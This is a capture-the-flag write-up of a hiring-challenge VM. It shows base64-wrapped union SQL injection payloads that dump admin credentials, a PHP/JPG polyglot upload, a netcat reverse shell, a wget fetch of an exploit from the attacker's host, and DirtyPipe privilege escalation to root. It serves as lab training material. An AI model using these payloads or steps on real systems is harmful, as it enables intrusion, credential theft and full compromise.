Saptang Labs Hiring Challenge

Challenge Type : Blackbox Testing

Challenge Description :

Download the VM and start it. It has a web application hosted which is configured to boot at start so you can put the VM in the background. Simply find the address of the application and start pentesting.

Challenge Goal : Find the file flag.txt and read its content.

First we start by finding the IP of machine here i used the netdiscover command.

┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $sudo netdiscover -r 192.168.1.12/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.4     **:**:**:**:**:**      1      60  CHONGQING FUGUI ELECTRONICS 
 192.168.1.1     **:**:**:**:**:**      1      60  Syrotech Networks. Ltd.     
 192.168.1.5     **:**:**:**:**:**      1      60  Intel Corporate             
 192.168.1.21    **:**:**:**:**:**      1      60  Intel Corporate

here 192.168.1.1 is ip of router.

we scane the IP 192.168.1.5,192.168.1.21 and the IP 192.168.1.21 have web service running at port 42710.

I use rustscan for port scaning in CTFs because it is insanely fast.

┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $rustscan -a 192.168.1.21
File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.
Open 192.168.1.21:42710
Starting Script(s)
Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
...

opening this website we have nothing but this page:

First though was to look for robots.txt file but no luck so i did directory bruteforcing with gobuster.

┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $gobuster dir -u http://192.168.1.21:42710/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.21:42710/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/12/21 22:09:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/Admin                (Status: 301) [Size: 321] [--> http://192.168.1.21:42710/Admin/]
/assets               (Status: 301) [Size: 322] [--> http://192.168.1.21:42710/assets/]
/includes             (Status: 301) [Size: 324] [--> http://192.168.1.21:42710/includes/]
/index.php            (Status: 200) [Size: 349]                                          
/search_result        (Status: 301) [Size: 329] [--> http://192.168.1.21:42710/search_result/]
/server-status        (Status: 403) [Size: 280]                                               
                                                                                              
===============================================================
2022/12/21 22:10:05 Finished
===============================================================

now we have some interesting directories like Admin and search_result.

Admin page requires authentication Username and Password.

http://192.168.1.21:42710/search_result/

now this is something interesting there is link to

http://192.168.1.21:42710/search_result/result_2022.php

The Results of 2022 have not been published yet so let's try 2021 :

http://192.168.1.21:42710/search_result/result_2021.php

on submitting the form we have this response:

ID, Name, Roll, Marks it looks like it is fetching this data from sql database so lets try SQL injection.

this POST request have data=NjIxNzI5NTgx it base64 encoded value of 621729581.

lets try with simple payload ' OR 1=1 # but it is not working after few tries i tried 621729581 OR 1=1 base64 encode and it gives us all the entries hooray, and that is successful SQL injection.

payload=

data=<@base64>621729581 OR 1=1<@/base64>

<-- I'm using Hackvertor burp extension.

we know the number of columns it is 4 : ID, Name, Roll, Marks.So the payload for union attack would be:

payload:

data=<@base64>621729581 UNION SELECT NULL, NULL, NULL, NULL<@/base64>

It gives us the result in response so payload is correct and we also know the data types it should be Integer for ID, Roll, Marks and String for Name so we can put this values in payload.

payload:

data=<@base64>621729581 UNION SELECT 1, "name", 2, 3<@/base64>

response:

Now we can try to extract the databases'name, tables'name, columns'name.

Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,schema_name,0x7c), 2, 3 fRoM information_schema.schemata<@/base64>

response:

|mysql|,|information_schema|,|performance_schema|,|sys|,|ezbox|

Now let's try to extract table name.

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,table_name,0x7c), 2, 3 fRoM information_schema.tables<@/base64>

response:

|results|,|users|,|ADMINISTRABLE_ROLE_AUTHORIZATIONS|,|APPLICABLE_ROLES|,|CHARACTER_SETS|,|CHECK_CONSTRAINTS|,|COLLATIONS|,|COLLATION_CHARACTER_SET_APPLICABILITY|,|COLUMNS|,|COLUMNS_EXTENSIONS|,|COLUMN_PRIVILEGES|,|COLUMN_STATISTICS|,|ENABLED_ROLES|,|ENGINES|,|EVENTS|,|FILES|,|INNODB_BUFFER_PAGE|,|INNODB_BUFFER_PAGE_LRU|,|INNODB_BUFFER_POOL_STATS|,|INNODB_CACHED_INDEXES|,|INNODB_CMP|,|INNODB_CMPMEM|,|INNODB_CMPMEM_RESET|,|INNODB_CMP_PER_INDEX|,|INNODB_CMP_PER_INDEX_RESET|,|INNODB_CMP_RESET|,|INNODB_COLUMNS|,|INNODB_DATAFILES|,|INNODB_FIELDS|,|INNODB_FOREIGN|,|INNODB_FOREIGN_COLS|,|INNODB_FT_BEING_DELETED|,|INNODB_FT_CONFIG|,|INNODB_FT_DEFAULT_STOPWORD|,|INNODB_FT_DELETED|,|INNODB_FT_INDEX_CACHE|,|INNODB_FT_INDEX_TABLE|,|INNODB_INDEXES|,|INNODB_METRICS|,|INNODB_SESSION_TEMP_TABLESPACES|,|INNODB_TABLES|,|INNODB_TABLESPACES|,|INNODB_TABLESPACES_BRIEF|,|INNODB_TABLESTATS|,|INNODB_TEMP_TABLE_INFO|,|INNODB_TRX|,|INNODB_VIRTUAL|,|KEYWORDS|,|KEY_COLUMN_USAGE|,|OPTIMIZER_TRACE|,|PARAMETERS|,|PARTITIONS|,|PLUGINS|,|PRO

We have table with name users let's see the columns of this table.

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,column_name,0x7c), 2, 3 fRoM information_schema.columns wHeRe table_name="users"<@/base64>

response:

|id|,|password|,|profile_picture|,|username|,|CURRENT_CONNECTIONS|,|TOTAL_CONNECTIONS|,|USER|

We have username and password here what should we do extract them!

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,username,0x7c), 2, 3 fRoM users<@/base64>

response: |Admin|

username=Admin

payload:

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,password,0x7c), 2, 3 fRoM users<@/base64>

response: |zohl8meicohci9raw0|

password=zohl8meicohci9raw0

We have username and password let's login as Admin.

http://192.168.1.21:42710/Admin/dashboard.php

looking at source code we have this comment:

visiting this page http://192.168.1.21:42710/Admin/edit_profile.php

We have functionality of file upload let's try uploading some php file.

Oops error can't upload php, let's try simple jpg file.

so we can only upload jpg file but how it is checking for file type extension? let's do one experiment rename the jpg file to php if error it is looking for extension and if successful it is checking MIME type.

Record updated successfullyThe file has been uploaded

so MIME type it is.

We have to create polyglot PHP/JPG payload. how i do it is open jpg file and append php payload at last so let's create simple.php payload.

Record updated successfullyThe file has been uploaded and file is uploaded successfully but where ?

we have column name profile_picture in users table, if you remember that we still have SQLi.

payload=

data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,profile_picture,0x7c), 2, 3 fRoM users<@/base64>

result = |../assets/uploads/simple.php|

so our file is at http://192.168.1.21:42710/assets/uploads/simple.php

It works just fine let's get reverse shell. for reference: https://www.revshells.com/

revshell.php

we start listener: nc -lvnp 8888

and path= http://192.168.1.21:42710/assets/uploads/revshell.php

on visiting this file we have reverse shell:

┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.12] from (UNKNOWN) [192.168.1.21] 38442
Linux heathrow-VirtualBox 5.11.0-16-generic #17-Ubuntu SMP Wed Apr 14 20:12:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 23:44:47 up  2:01,  1 user,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
heathrow tty2     tty2             21:32    2:12m  0.03s  0.03s /usr/libexec/gnome-session-binary --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (732): Inappropriate ioctl for device
bash: no job control in this shell
www-data@heathrow-VirtualBox:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@heathrow-VirtualBox:/$

We have shell but we can't access /home/heathrow we need to escalate our privilege. first thing that comes in mind is linpeas.sh let's move that to victim machine i create local server with python python -m http.server 80, to transfer file because we normally don't have internet access in victim machine.

change permissions to +x : chmod +x linpeas.sh

Now run the file: ./linpeas.sh

Analyzing the output we have first suggestion for [CVE-2022-0847] DirtyPipe:

reference: https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

we follow the steps in GitHub repo and we have exploit-1, exploit-2. transfer this to victim machine and run.

www-data@heathrow-VirtualBox:/tmp$ wget 192.168.1.12/exploit-2
wget 192.168.1.12/exploit-2
--2022-12-22 00:04:11--  http://192.168.1.12/exploit-2
Connecting to 192.168.1.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21480 (21K) [application/octet-stream]
Saving to: 'exploit-2'

     0K .......... ..........                                 100%  395K=0.05s

2022-12-22 00:04:11 (395 KB/s) - 'exploit-2' saved [21480/21480]

www-data@heathrow-VirtualBox:/tmp$ ./exploit-2 /usr/bin/sudo
./exploit-2 /usr/bin/sudo
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
find / -type f -name "flag.txt" 2>/dev/null
/home/heathrow/flag.txt
cat /home/heathrow/flag.txt
flag{box_cracked_successfully_report_to_admin}challenge

flag:

flag{box_cracked_successfully_report_to_admin}challenge

:octocat: Happy Hacking :octocat:

PreviousAcademy Box - PEH Capstone TCM Security

Last updated 2 years ago